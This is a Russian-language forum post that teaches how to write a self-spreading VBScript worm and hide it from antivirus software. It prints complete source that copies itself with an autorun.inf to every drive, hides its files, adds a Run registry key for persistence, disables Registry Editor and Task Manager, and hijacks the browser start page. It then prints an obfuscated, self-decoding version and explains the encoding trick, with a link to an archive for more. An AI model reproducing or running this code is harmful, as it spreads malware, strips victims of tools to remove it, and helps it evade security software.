SizeKing
Сообщений: 41
Оценки: 0
Присоединился: 2010-03-03 10:48:33.933333
|
Что такое vbs? это скриптовый язык вишуал басик. Откройте блокнот, сохраните его под именем 1.txt затем переименуйте 1.txt в 1.vbs и откройте 1.vbs - внем можно писать код. Сейчас многие антивирусы сразу блокируют vbs, но я расскажу вам технологию написания и защиты от антивирусов. Что должен делать vbs? нужно создать бесконечный цикл с задержкой в несколько секунд и прописывать вирус в авторан дальше нужно организовать цикл с перечислением англ алфавита от A до Z после чего в цикле последовательно копировать файл вируса на все диски (а вдруг пользователь воткнет флэшку :)) ) вместе с копией вируса должен создаваться файл autorun.inf который должен содержать такой текст
[autorun]
shellexecute=wscript.exe 1.vbs
где 1.vbs это имя вируса который лежит рядом с этим файлом файл autorun.inf нужен чтобы вирус запускался автоматически (например когда воткнули флэшку с этим содержимым) еще нужно не забыть скрывать все файлы делая их системными, чтобы ламер не смог их удалить и главное, нужно отключить реестр и диспетчер задач. И вот когда движек готов можно в нем реализовать любые действия например можно забить компьютер хламом, текстовыми файлами с различным содержимым, ламак будет чистить комп год от них )) посмотрим на готовый вирус
on error resume next
pflag=1
strr=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z")
for q=0 to ubound(strr)
if WScript.ScriptFullName = strr(q) & ":\" & WScript.ScriptName then
pflag=0
end if
next
if pflag=1 then
Set S = CreateObject("Wscript.Shell")
s.run "wmplayer.exe "_
&"http://on-tv.ru/asx/tv_id4.asx "_
&"http://on-tv.ru/asx/tv_id500.asx "_
&"http://on-tv.ru/asx/tv_id11.asx "_
&"http://www.rambler-audio.ru/asx/video/special/eurosportnews/eurosport.asx "_
&"http://on-tv.ru/asx/tv_id642.asx "_
&"http://on-tv.ru/asx/tv_id59.asx "_
&"http://on-tv.ru/asx/tv_id568.asx "_
&"http://on-tv.ru/asx/tv_id10.asx "_
&"http://www.impacttelevision.org/live/live270.asx "_
&"http://www.tvr.by/liveair/btv.asx "_
&"http://on-tv.ru/asx/tv_id428.asx "_
&"http://www.kulturatv.kiev.ua/Kultura-EU.asx "_
&"http://media.wnet.ua/lists/5tv.asx"
end if
dost1=1
Do
Wscript.sleep(15000)
if dost1=1 then
Wscript.sleep(15000)
end if
strr=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z")
for q=0 to ubound(strr)
Set FileSystemObject = CreateObject("scripting.filesystemobject")
if not FileSystemObject.FileExists (strr(q) & ":\" & WScript.ScriptName) then
if not strr(q) = "C" then
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile(strr(q) & ":\" & "autorun.inf",True)
tf.WriteLine("[autorun]")
tf.WriteLine("shellexecute=wscript.exe " & WScript.ScriptName)
tf.Close
end if
Set FileSystemObject = CreateObject("scripting.filesystemobject")
FileSystemObject.copyfile WScript.ScriptFullName,strr(q) & ":\" & WScript.ScriptName
Set flt = fso.GetFile(strr(q) & ":\" & WScript.ScriptName)
flt.Attributes = 6
if not strr(q) = "C" then
Set flt = fso.GetFile(strr(q) & ":\" & "autorun.inf")
flt.Attributes = 6
end if
end if
next
Set Shell = CreateObject("Wscript.Shell")
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MediaPlayer","C:\" & WScript.ScriptName
if dost1=1 then
dost1=0
Set Shell = CreateObject("Wscript.Shell")
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.google.ru/#hl=ru&source=hp&q=vProFlood&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=vProFlood&fp=efd878c0817b5b99"
Set Shell = CreateObject("Wscript.Shell")
Shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
Set S = CreateObject("Wscript.Shell")
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr","1","REG_DWORD"
Set S = CreateObject("Wscript.Shell")
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Program vProFlood"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","Program vProFlood"
Set S = CreateObject("Wscript.Shell")
s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Program vProFlood"
Shell.Run "iexplore.exe http://www.google.ru/#hl=ru&source=hp&q=vProFlood&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=vProFlood&fp=efd878c0817b5b99"
Shell.Run "firefox.exe http://yandex.ru/yandsearch?text=vProFlood&lr=2&stpar2=%2Fh1%2Ftm319%2Fs1&stpar4=%2Fs1&stpar1=%2Fu0"
end if
loop
можете запустить его, он не смертелен, покажет вам онлайн каналы в медиа плеере :) а теперь помотрим как защитить этот код от антивирусов и любопытных ламеров вот во что он превратился
c=c & "nmmjdgblc .sD0#;/p_nrq$/qD0#;2p_nrq$/qD0#7/1krD0#/fD0#;0p_nrq$0;"
c=c & "pj$bmmjDmpNt;rvcr=fap_cqbl_w-sp,vcbl_w--8nrrfcvc,vmdcpgd lsP,jjcfQ "
c=c & "77`3`5/6.a656bdc;nd$bmmjDmpNt;om$d;o_$;pj$cjemmE)0@#.B#)?@#.B#/6#/B#6@#"
c=c & ".B#C@#.B#D7#.B#;Elr`$bmmjDmpNt;o$nf;capsmq$sp;jf!-sp,cjemme,uuu--8nrrf"
c=c & "cvc,cpmjnvcg lsP,jjcfQ bmmjDmpNtk_pempN * elgprQbcxgj_amJZ{C237D0.."
c=c & "??..+6.D7+@/./+/6.3+.2.DD324yZBGQJAZRMMP]QCQQ?JA]WCIF crgpuecp,q' jj"
c=c & "cfQ,rngpaqU &rach`Mcr_cpA;QrcQ bmmjDmpNtk_pempN * lmgr_xgl_epMbcp"
c=c & "crqgecPZlmgqpcTrlcppsAZRLqumblgUZrdmqmpagKZCP?URDMQZKJIF crgpuecp,q"
c=c & " bmmjDmpNtk_pempN * pcluMbcpcrqgecPZlmgqpcTrlcppsAZRLqumblgUZrdmqmpag"
c=c & "KZCP?URDMQZKJIF crgpuecp,q' jjcfQ,rngpaqU &rach`Mcr_cpA;QrcQ BP"
c=c & "MUB]ECP * / * pekiq_rcj`_qgbZkcrqwQZqcgagjmNZlmgqpcTrlcppsAZqumblgUZrdm"
c=c & "qmpagKZcp_urdmQZSAIF crgpuecp,q' jjcfQ,rngpaqU &rach`Mcr_cpA;QrcQ"
c=c & " BPMUB]ECP */* qjmmRwprqgecPcj`_qgBZKCRQWQZQCGAGJMNZLMGQPCTRLCPPSAZQ"
c=c & "UMBLGUZRDMQMPAGKZCP?URDMQZPCQS]RLCPPSA]WCIF crgpUecP,jjcfQ' jjcfQ,rn"
c=c & "gpaqU &rach`Mcr_cpA;jjcfQrcQ 77`3`5/6.a656bdc;nd$bmmjDmpNt;om$d;o_"
c=c & "$;pj$cjemmE)0@#.B#)?@#.B#/6#/B#6@#.B#C@#.B#D7#.B#;Elr`$bmmjDmpNt;o$nf;c"
c=c & "apsmq$sp;jf!-sp,cjemme,uuu--8nrrf * ce_Nrp_rQZlg_KZpcpmjnvCrclpcrlGZr"
c=c & "dmqmpagKZcp_urdmQZPCQS]RLCPPSA]WCIF crgpUecP,jjcfQ' jjcfQ,rngpaqU &r"
c=c & "ach`Mcr_cpA;jjcfQrcQ.;/rqmblcfr/;/rqmbdgck_LrngpaQ,rngpaQU$"
c=c & " Z8A * pcw_jN_gbcKZlsPZlmgqpcTrlcppsAZqumblgUZrdmqmpagKZCP?URDMQZCLGFA"
c=c & "?K]J?AMJ]WCIF crgpUecP,jjcfQ' jjcfQ,rngpaqU &rach`Mcr_cpA;jjcfQrc"
c=c & "Qrvcldgblcdgblc4;qcrs`gprr?,rjd' dlg,lspmrs_ $ Z8 $'o"
c=c & "&pprq&cjgDrcE,mqd;rjdrcQlcfr A ;'o&pprqrmldg4;qcrs`gprr?,"
c=c & "rjd'ck_LrngpaQ,rngpaQU$ Z8 $'o&pprq&cjgDrcE,mqd;rjdrcQck_Lrn"
c=c & "gpaQ,rngpaQU$ Z8 $'o&pprq*ck_LjjsDrngpaQ,rngpaQUcjgdwnma,rach`Mkcr"
c=c & "qwQcjgD' rach`mkcrqwqcjgd,elgrngpaq &rach`Mcr_cpA;rach`MkcrqwQcjgD"
c=c & "rcQdgblccqmjA,dr'ck_LrngpaQ,rngpaQU$ cvc,rngpaqu;crsacvcjjcfq"
c=c & " &clgJcrgpU,dr' [lspmrs_Y &clgJcrgpU,dr'cspR* dlg,lspmrs_ $ Z8 $"
c=c & "'o&pprq&cjgDrvcRcr_cpA,mqd;drrcQ' rach`MkcrqwQcjgD,elgrngpaQ &rac"
c=c & "h`Mcr_cpA;mqdrcQlcfr A ;'o&pprqrmldglcfr'ck_LrngpaQ,rngpaQ"
c=c & "U$ Z8 $'o&pprq&qrqgvCcjgD,rach`MkcrqwQcjgDrmldg' rach`mkcrqwqc"
c=c & "jgd,elgrngpaq &rach`Mcr_cpA;rach`MkcrqwQcjgDrcQ'pprq&blsm`smr.;o"
c=c & "pmd' X * W * V * U * T * S * R * Q * P * O * N * M * L * K * J * I * "
c=c & "H * G * F * E * D * C * B * A * @ * ? &w_pp_;pprqdgblc'...3/&nccjq"
c=c & ",rngpaqUlcfr/;/rqmbdg'...3/&nccjq,rngpaqUmB/;/rqmbdgblc "
c=c & "vq_,tr3-qrqgj-_s,rclu,_gbck--8nrrf $] vq_,SC+_psrjsI-_s,tcgi,tr_psrj"
c=c & "si,uuu--8nrrf $] vq_,602bg]tr-vq_-sp,tr+lm--8nrrf $] vq_,tr`-pg_c"
c=c & "tgj-w`,ptr,uuu--8nrrf $] vq_,.50ctgj-ctgj-epm,lmgqgtcjcrra_nkg,uuu--"
c=c & "8nrrf $] vq_,./bg]tr-vq_-sp,tr+lm--8nrrf $] vq_,643bg]tr-vq_-sp,t"
c=c & "r+lm--8nrrf $] vq_,73bg]tr-vq_-sp,tr+lm--8nrrf $] vq_,024bg]tr-vq"
c=c & "_-sp,tr+lm--8nrrf $] vq_,rpmnqmpsc-quclrpmnqmpsc-j_gacnq-mcbgt-vq_-s"
c=c & "p,mgbs_+pcj`k_p,uuu--8nrrf $] vq_,//bg]tr-vq_-sp,tr+lm--8nrrf $] "
c=c & "vq_,..3bg]tr-vq_-sp,tr+lm--8nrrf $] vq_,2bg]tr-vq_-sp,tr+lm--8nrrf $"
c=c & "] cvc,pcw_jnku lsp,q' jjcfQ,rngpaqU &rach`Mcr_cpA;QrcQlcfr/"
c=c & ";e_jdndgrvcldgblc.;e_jdnlcfrck_LrngpaQ,rngpaQU$ Z8 $'o&p"
c=c & "prq;ck_LjjsDrngpaQ,rngpaQUdg'pprq&blsm`smr.;opmd' X * W * V * "
c=c & "U * T * S * R * Q * P * O * N * M * L * K * J * I * H * G * F * E * D * "
c=c & "C * B * A * @ * ? &w_pp_;pprq/;e_jdnrvclcksqcppmppclmbmmjDmpNt"
c=c & "888q_rpct888%":for i=1 to len(c):t=chr(asc(mid(c,i,1))+2):k=k+t:next:execute StrReverse(k)
как кодировать? превратить вирус в строку и перечитать задом наперет, вычесть из кода каждого символа 1 запихнуть полученный результат в переменную и с помощью vbs написать движек обратного перекодирования продолжение в архиве, описание и все необходимое http://vproflood.onfind.net/vprsrv.rar :)
|